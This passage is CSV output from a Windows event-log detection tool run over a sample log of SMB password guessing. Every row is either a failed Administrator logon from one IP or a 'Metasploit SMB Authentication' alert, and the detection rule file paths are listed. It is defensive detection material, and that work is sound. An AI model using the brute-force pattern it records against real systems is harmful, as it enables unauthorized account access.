SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7MTbgvYN6PIaKxeK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAjWfgmGrm3o2mAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9EZYPG6uQtsez1UI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.683 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PRcnsdLAKd7enemG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUZEQaUavv7fWk4w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.759 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JKth56VEMqMCgwG9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TCGlvOFFkVpSHSoM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.834 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmLxSIastsvqdJC8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IPyvUDHHWzbhyvZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.895 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7dF4fIlAvIBYiw0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.935 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPDPtH2m9TgW8Khg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:13.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AChGHCNom0ds5ujV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8sLQI4KGgQRq2Sy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dqeLFLRT5EXiCBUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dx3tco9up7XnOa7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.124 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZdNX4ubtpQaV9EeF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.159 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S05I0ZlGKGazkVkL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.189 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzbfrYSYhxH6WcCt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGTvXs8Mlc0Fi7iT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1LjtTFjPfPlBqAi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lhJW3iO1xGGTMhp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IMz7WmlBTgadVgN8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OB02epCA5pc5oBeJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KAFgReUMtu9VerRl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.503 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ByeL26yQfohpQT3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 527r3nh9ocmItXfL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.597 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HNeC1BBFVXv839Ys : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: juXXpQcoPfJLMQ3L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: njNdv4lGnsUpooCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j6VchLhWJT7cCWVR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r3xxnFpbd8zkFm0h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jtf156NEpOebQHGC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 